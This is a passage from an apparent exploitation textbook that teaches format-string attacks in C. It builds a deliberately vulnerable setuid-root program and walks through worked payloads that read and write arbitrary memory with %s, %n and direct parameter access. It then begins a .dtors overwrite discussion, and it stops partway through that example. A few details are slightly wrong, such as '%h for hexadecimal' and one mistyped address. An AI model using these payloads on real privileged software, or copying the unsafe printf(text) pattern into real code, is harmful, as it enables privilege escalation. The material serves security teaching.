0x290 Format Strings

Format-string exploits are a relatively new class of exploit. Like buffer-overflow exploits, the ultimate goal of a format-string exploit is to overwrite data in order to control the execution flow of a privileged program. Format-string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format-string vulnerabilities and eliminate them. But first some background on format strings is needed.

0x291 Format Strings and printf()

Format strings are used by format functions, like printf(). These are functions that take in a format string as the first argument, followed by a variable number of arguments that are dependant on the format string. The printf() command has been used extensively in the previous pieces of code. Here's one example from the last program:

printf("You picked:    %d\n", user_pick);

Here the format string is "You picked: %d\n". The printf() function prints the format string, but it performs a special operation when a format parameter like %d is encountered. This parameter is used to print the next argument of the function as a decimal integer value. The following table lists some other similar format parameters:

Parameter	Output Type

%d	Decimal
%u	Unsigned decimal
%x	Hexadecimal

All of the preceding format parameters get their data as values, not pointers to values. There are also some format parameters that expect pointers, such as the following:

Parameter	Output Type

%s	String
%n	Number of bytes written so far

The %s format parameter expects to be given a memory address and prints the data at that memory address until a null byte is encountered. The %n format parameter is special, in that it actually writes data. It also expects to be given a memory address and writes the number of bytes that have been written so far into that memory address.

A format function, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three additional arguments to the function (in addition to the format-string argument). Some example code should help clarify things.

fmt_example.c code

#include <stdio.h>

int main()
{
   char string[7] = "sample";
   int A = -72;
   unsigned int B = 31337;
   int count_one, count_two;

// Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s Address %08x\n", string, string);

// Example of unary address operator and a %x format string
   printf("count_one is located at: %08x\n", &count_one);
   printf("count_two is located at: %08x\n", &count_two);

// Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in
count_one, and the number of bytes up to here X%n is being stored in count_two.\n",
&count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

// Stack Example
printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);

exit(0);
}

The following is the output of the program's compilation and execution.

$ gcc -o fmt_example fmt_example.c
$ ./fmt_example
[A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: ' 31337', '00031337'
[string] sample Address bffff960
count_one is located at: bffff964
count_two is located at: bffff960
The number of bytes written up to this point X is being stored in count_one, and
the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is -72 and is at bffff95c. B is 31337 and is at bffff958.
$

The first two printf() statements demonstrate the printing of variables A and B, using different format parameters. Because there are three format parameters in each line, the variables A and B need to be supplied three times each. The %d format parameter allows for negative values, while %u does not, because it is expecting unsigned values.

A is outputted as a very high value when %u is used, because the negative value is stored using two's complement, but displayed as an unsigned value. Two's complement is the way negative numbers are stored on computers. The idea behind two's complement is to provide a binary representation of a number that when added to a positive number of the same magnitude will produce zero. This is done by first writing the positive number in binary, then flipping all the bits, and finally adding one. This can be quickly explored and validated with a hexadecimal and binary calculator, such as pcalc.

$ pcalc 72
        72              0x48              0y1001000
$ pcalc 0y0000000001001000
        72              0x48              0y1001000
$ pcalc 0y1111111110110111
        65463           0xffb7            0y1111111110110111
$ pcalc 0y1111111110110111 + 1
        65464           0xffb8            0y1111111110111000
$

This pcalc example shows that the last 2 bytes of the two's complement representation for –72 should be 0xffb8, which can be seen to be correct in the hexadecimal output of A.

The third line in the example, labeled [field width on B], shows the use of the field width option in a format parameter. This is just an integer number that designates the minimum field width for that format parameter. However, this is not a maximum field width: If the value to be outputted is greater than the field width, the field width will be exceeded. This happens when 3 is used, because the output data needs 5 bytes. When 10 is used as the field width, 5 bytes of blank space are outputted before the output data. Additionally, if a field width value begins with a zero, this means the field should be padded with zeros. When 08 is used, for example, the output is 00031337.

The fourth line, labeled [string], simply shows the use of the %s format parameter. The variable string is actually a pointer containing the address of the string, which works out wonderfully, because the %s format parameter expects its data to be passed by reference.

As these examples show, you should use %d for decimal, %u for unsigned, and %h for hexadecimal values. Minimum field widths can be set by putting a number right after the percent sign, and if the field width begins with 0, it will be padded with zeros. The %s parameter can be used to print strings and should be passed the address of the string. So far, so good.

The next part of the example demonstrates the use of the unary address operator. In C, any variable prepended with an ampersand will return the address of that variable. Here's that section of the fmt_example.c code:

// Example of unary address operator and a %x format string
  printf("count_one is located at: %08x\n", &count_one);
  printf("count_two is located at: %08x\n", &count_two);

The next piece of the fmt_example.c code demonstrates the use of the %n format parameter. The %n format parameter is different than all other format parameters, in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes out the number of bytes that have been written by the function to the address in the corresponding function argument. In fmt_example, this is done at two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then outputted, revealing that 46 bytes are found before the first %n, and 113 before the second.

Finally, the stack example provides a convenient segue into an explanation of the stack's role with format strings:

printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);

When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order. First the address of B is pushed, then the value of B, then the address of A, then the value of A, and finally the address of the format string. The stack will look like this:

The top of the stack

The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.

But what if only three arguments are pushed to the stack with a format string that uses four format parameters? Try changing the printf() line in the stack example to this:

printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B);

This can be done in an editor or with a little bit of sed magic.

$ sed -e 's/B, &B)/B)/' fmt_example.c > fmt_example2.c
$ gcc -o fmt_example fmt_example2.c
$ ./fmt_example
[A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '    31337', '00031337'
[string] sample Address bffff970
count_one is located at: bffff964
count_two is located at: bffff960
The number of bytes written up to this point X is being stored in count_one, and
the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is -72 and is at bffff96c. B is 31337 and is at 00000071.
$

The result is 00000071. What the hell is 00000071? It turns out that because there wasn't a value pushed to the stack, the format function just pulled data from where the fourth argument should have been (by adding to the current frame pointer). This means 0x00000071 is the first value found below the stack frame for the format function.

This is definitely an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.

0x292 The Format-String Vulnerability

Sometimes programmers print strings using printf(string), instead of printf("%s", string). Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Both methods are shown in the following example.

fmt_vuln.c code

#include <stdlib.h>

int main(int argc, char *argv[])
{
   char text[1024];
   static int test_val = -72;

   if(argc < 2)
   {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way:\n");
// The right way to print user-controlled input:
   printf("%s", text);
// ---------------------------------------------

   printf("\nThe wrong way:\n");
// The wrong way to print user-controlled input:
   printf(text);
// ---------------------------------------------
   printf("\n");
// Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}

The following output shows the compilation and execution of fmt_vuln.

$ gcc -o fmt_vuln fmt_vuln.c
$ sudo chown root.root fmt_vuln
$ sudo chmod u+s fmt_vuln
$ ./fmt_vuln testing
The right way:
testing
The wrong way:
testing
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

Both methods seem to work fine with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.

$ ./fmt_vuln testing%x
The right way:
testing%x
The wrong way:
testingbffff5a0
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

When the %x format parameter was used, the hexadecimal representation of a 4-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.

$ ./fmt_vuln 'perl -e 'print "%08x."x40;''
The right way:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08
x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%
08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way:
bffff4e0.000003e8.000003e8.78383025.3830252e.30252e78.252e7838.2e783830.78383025.38
30252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.7838
3025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e7838
30.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838
.2e783830.78383025.3830252e.
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

So this is what the lower stack memory looks like. Remember that each 4-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are.

$ printf "\x25\x30\x38\x78\x2e\n"
%08x.
$

As you can see, it's the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.

0x293 Reading from Arbitrary Memory Addresses

The %s format parameter can be used to read from arbitrary memory addresses. Because it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:

$ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way:
AAAA%08x.%08x.%08x.%08x
The wrong way:
AAAAbffff590.000003e8.000003e8.41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash in a segmentation fault, because this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.

$ ./getenvaddr PATH
PATH is located at 0xbffffd10
$ pcalc 0x10 + 4
      20          0x14       0y10100
$ ./fmt_vuln 'printf "\x14\xfd\xff\xbf"'%08x.%08x.%08x%s
The right way:
yáÿ¿%08x.%08x.%08x%s
The wrong way:
yáÿ¿bffff480.00000065.00000000/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/
usr/games/bin:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
$ ./fmt_vuln 'printf "\x14\xfd\xff\xbf"'%x.%x.%x%s
The right way:
yáÿ¿%x.%x.%x%s
The wrong way:
yáÿ¿bffff490.65.0/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/usr/games/bin
:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin
[*] test_val @ 0x08049570 = -72 0xffffffb8

Here the getenvaddr program is used to get the address for the environment variable PATH. Because the program name fmt_vuln is two bytes less than getenvaddr, 4 is added to the address, and the bytes are reversed due to the byte ordering. The fourth format parameter of %s reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Because this address is the address of the PATH environment variable, it is printed as if a pointer to the environment variable were passed to printf().

Now that the distance between the end of the stack frame and the beginning of the format-string memory is known, the field width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.

0x294 Writing to Arbitrary Memory Addresses

If the %s format parameter can be used to read an arbitrary memory address, the same technique using %n should be able to write to an arbitrary memory address. Now things are getting interesting.

The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln program, just begging to be overwritten. The test variable is located at 0x08049570, so by using a similar technique as before, you should be able to write to the variable.

$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%x%n
The right way:
%x.%x.%x%n
The wrong way:
bffff5a0.3e8.3e8
[*] test_val @ 0x08049570 = 20 0x00000014
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%08x.%08x.%08x%n
The right way:
%08x.%08x.%08x%n
The wrong way:
bffff590.000003e8.000003e8
[*] test_val @ 0x08049570 = 30 0x0000001e
$

As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.

$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%100x%n
The right way:
%x.%x.%100x%n
The wrong way:
bffff5a0.3e8.
                                       3e8
[*] test_val @ 0x08049570 = 117 0x00000075
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%183x%n
The right way:
%x.%x.%183x%n
The wrong way:
bffff5a0.3e8.
                                                 3e8
[*] test_val @ 0x08049570 = 200 0x000000c8
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%238x%n
The right way:
%x.%x.%238x%n
The wrong way:
bffff5a0.3e8.

                                3e8
[*] test_val @ 0x08049570 = 255 0x000000ff
$

By manipulating the field width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines, which, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work fine for small numbers, but it won't work for larger numbers, like memory addresses.

Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. Remember that the least significant byte is actually located in the first byte of the 4-byte word of memory. This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a 4-byte word, as shown here:

Memory	XX XX XX XX	Address
`First write`	`AA 00 00 00`	`0x08049570`
`Second write`	`BB 00 00 00`	`0x08049571`
`Third write`	`CC 00 00 00`	`0x08049572`
`Fourth write`	`DD 00 00 00`	`0x08049573`
`Result`	`AA BB CC DD`

As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049570, 0x08049571, 0x08049572, and 0x08049573 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.

The first write should be easy.

$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%x%n
The right way:
%x.%x.%x%n
The wrong way:
bffff5a0.3e8.3e8
[*] test_val @ 0x08049570 = 20 0x00000014
$ pcalc 20 - 3
        17             0x11             0y10001
$ pcalc 0xaa - 17
        153            0x99             0y10011001
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%153x%n
The right way:
%x.%x.%153x%n
The wrong way:
bffff5a0.3e8.

                  3e8
[*] test_val @ 0x08049570 = 170 0x000000aa
$

The first byte should be 0xAA, and the last %x format parameter outputs 3 bytes of 3e8. Because 20 was written into the test variable, basic math can be used to deduce that the format parameters before that had written 17 bytes. In order to get the least significant byte to equal 0xAA, the last %x format parameter must be made to output 153 bytes instead of just 3. The field width parameter can make this adjustment quite nicely.

Now for the next write. Another argument is needed for another %x format parameter to increment the byte count up to 187, which is 0xBB in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049570. Because this is all still in the memory of the format string, it can be easily controlled. The word "JUNK" is four bytes long and will work fine.

After that, the next memory address to be written to, 0x08049771, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed out by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.

Perhaps the beginning of the format string should be thought about ahead of time. The end goal is to have four writes. Each one will need to have a memory address passed to it, and between them all, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. So, for the entire write procedure, the beginning of the format string should look like this:

Let's give it a try.

$ ./fmt_vuln 'printf
"\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.%
x.%x%n
The right way:
JUNKJUNKJUNK%x.%x.%x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.3e8
[*] test_val @ 0x08049570 = 44 0x0000002c
$ pcalc 44 - 3
        41             0x29            0y101001
$ pcalc 0xaa - 41
        129            0x81            0y10000001
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.%
x.%129x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

       3e8
[*] test_val @ 0x08049570 = 170 0x000000aa
$

The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 153, because six new 4-byte words have been added to the front of the format string.

Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.

$ pcalc 0xbb - 0xaa
        17             0x11          0y10001
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.%
x.%129x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

       3e8        4b4e554a
[*] test_val @ 0x08049570 = 48042 0x0000bbaa
$

The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Because memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.

This process can be repeated for the third and fourth writes.

$ pcalc 0xcc - 0xbb
        17             0x11          0y10001
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.%
x.%129x%n%17x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

       3e8         4b4e554a         4b4e554a
[*] test_val @ 0x08049570 = 13417386 0x00ccbbaa
$ pcalc 0xdd - 0xcc
        17             0x11          0y10001
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.%
x.%129x%n%17x%n%17x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

       3e8         4b4e554a         4b4e554a          4b4e554a
[*] test_val @ 0x08049570 = -573785174 0xddccbbaa
$

By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also get overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.

Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.

$ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c >
fmt_vuln2.c
$ diff fmt_vuln.c fmt_vuln2.c
6c6
`       static int test_val = -72;
---
>       static int test_val = -72, next_val = 0x11111111;
27a28
>       printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val,
next_val);
$ gcc -o fmt_vuln2 fmt_vuln2.c
$ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080495d0 = -72 0xffffffb8
[*] next_val @ 0x080495d4 = 286331153 0x11111111

As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. It should be good practice to write an address into the variable test_val again, using the new address.

Last time, a very convenient address of 0xddccbbaa was used. Because each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, 205 bytes must first be outputted in order to write the first byte of 0xCD using the %n format parameter. But then the next byte to be written is 0xAB, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it. So, instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again to set the least significant byte to 0x06 for the third write.

$ ./fmt_vuln2 AAAA%x.%x.%x.%x
The right way:
AAAA%x.%x.%x.%x
The wrong way:
AAAAbffff5a0.3e8.3e8.41414141
[*] test_val @ 0x080495d0 = -72 0xffffffb8
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$ ./fmt_vuln2 'printf
"\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.%
x.%x.%n
The right way:
JUNKJUNKJUNK%x.%x.%x.%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.3e8.
[*] test_val @ 0x080495d0 = 45 0x0000002d
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$ pcalc 45 - 3
        42              0x2a           0y101010
$ pcalc 0xcd - 42
        163             0xa3           0y10100011
$ ./fmt_vuln2 'printf
"\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.%
x.%163x.%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

                                         3e8.
[*] test_val @ 0x080495d0 = 205 0x000000cd
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$
$ pcalc 0xab - 0xcd
        -34             0xffffffde     0y11111111111111111111111111011110
$ pcalc 0x1ab - 0xcd
        222             0xde            0y11011110
$ ./fmt_vuln2 'printf
"\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.%
x.%163x.%n%222x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

                                         3e8.

                                           4b4e554a
[*] test_val @ 0x080495d0 = 109517 0x0001abcd
[*] next_val @ 0x080495d4 = 286331136 0x11111100
$
$ pcalc 0x06 - 0xab
        -165            0xffffff5b       0y11111111111111111111111101011011
$ pcalc 0x106 - 0xab
        91              0x5b             0y1011011
$ ./fmt_vuln2 'printf
"\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.%
x.%163x.%n%222x%n%91x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

                                         3e8.

                                          4b4e554a

                                                         4b4e554a
[*] test_val @ 0x080495d0 = 33991629 0x0206abcd
[*] next_val @ 0x080495d4 = 286326784 0x11110000
$

With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.

$ pcalc 0x08 - 0x06
        2             0x2          0y10
$ ./fmt_vuln2 'printf
"\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.%
x.%163x.%n%222x%n%91x%n%2x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%2x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e0.

                                 3e8.

                                   4b4e554a
                                                4b4e554a4b4e554a
[*] test_val @ 0x080495d0 = 235318221 0x0e06abcd
[*] next_val @ 0x080495d4 = 285212674 0x11000002
$

What happened here? The difference between 0x06 and 0x08 is only 2, but 8 bytes are outputted, resulting in the byte 0x0e being written by the %n format parameter instead. This is because the field width option for the %x format parameter is only a minimum field width, and 8 bytes of data were to be outputted. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.

$ pcalc 0x108 - 0x06
        258             0x102          0y100000010
$ ./fmt_vuln2 'printf
"\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.%
x.%163x.%n%222x%n%91x%n%258x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%258x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

                                 3e8.

                                   4b4e554a
                                                   4b4e554a

                                4b4e554a
[*] test_val @ 0x080495d0 = 134654925 0x0806abcd
[*] next_val @ 0x080495d4 = 285212675 0x11000003
$

Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all 4 bytes of the variable test_val. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than 8 may need to be wrapped around in a similar fashion.

0x295 Direct Parameter Access

Direct parameter access is a way to simplify format-string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.

As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %N$d would access the Nth parameter and display it as a decimal number.

printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);

The preceding printf() call would have the following output:

7th: 70, 4th: 00040

First, the 70 is outputted as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.

$ ./fmt_vuln AAAA%x.%x.%x.%x
The right way:
AAAA%x.%x.%x.%x
The wrong way:
AAAAbffff5a0.3e8.3e8.41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$ ./fmt_vuln AAAA%4\$x
The right way:
AAAA%4$x
The wrong way:
AAAA41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Because this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed the right way.

Direct parameter access also simplifies the writing of memory addresses. Because memory can be accessed directly, there's no need for 4-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually perform this function can just directly access a piece of memory found before the format string. For practice, let's try writing a more realistic looking address of 0xbffffd72 into the variable test_val using direct parameter access.

$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$x%4\$n
The right way:
%3$x%4$n
The wrong way:
3e8
[*] test_val @ 0x08049570 = 19 0x00000013
$ pcalc 0x72 - 16
        98              0x62             0y1100010
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n
The right way:
%3$98x%4$n
The wrong way:

                       3e8
[*] test_val @ 0x08049570 = 114 0x00000072
$
$ pcalc 0xfd - 0x72
        139             0x8b            0y10001011
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n%3\$
139x%5\$n
The right way:
%3$98x%4$n%3$139x%5$n
The wrong way:

                        3e8

                  3e8
[*] test_val @ 0x08049570 = 64882 0x0000fd72
$
$ pcalc 0xff - 0xfd
        2              0x2              0y10
$ pcalc 0x1ff - 0xfd
        258            0x102            0y100000010
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n%3\$
139x%5\$n%3\$258x%6\$n
The right way:
%3$98x%4$n%3$139x%5$n%3$258x%6$n
The wrong way:

                       3e8

                3e8

                                                            3e8
[*] test_val @ 0x08049570 = 33553778 0x01fffd72
$
$ pcalc 0xbf - 0xff
        -64             0xffffffc0     0y11111111111111111111111111000000
$ pcalc 0x1bf - 0xff
        192             0xc0           0y11000000
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n%3\$
139x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$98x%4$n%3$139x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                       3e8

                 3e8

                                                            3e8
                                     3e8
[*] test_val @ 0x08049570 = -1073742478 0xbffffd72
$

Using direct parameter access simplifies the process of writing an address and shrinks the mandatory size of the format string.

The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.

0x296 Detours with dtors

In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main function is executed, and destructor functions are executed just before the main function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.

A function can be declared as a destructor function by defining the destructor attribute, as seen in the following code example.

dtors_sample.c code

#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

main()
{
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void)
{
   printf("In the cleanup function now..\n");
}

In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main function exits, as shown next.

$ gcc -o dtors_sample dtors_sample.c
$ ./dtors_sample
Some actions happen in the main() function..
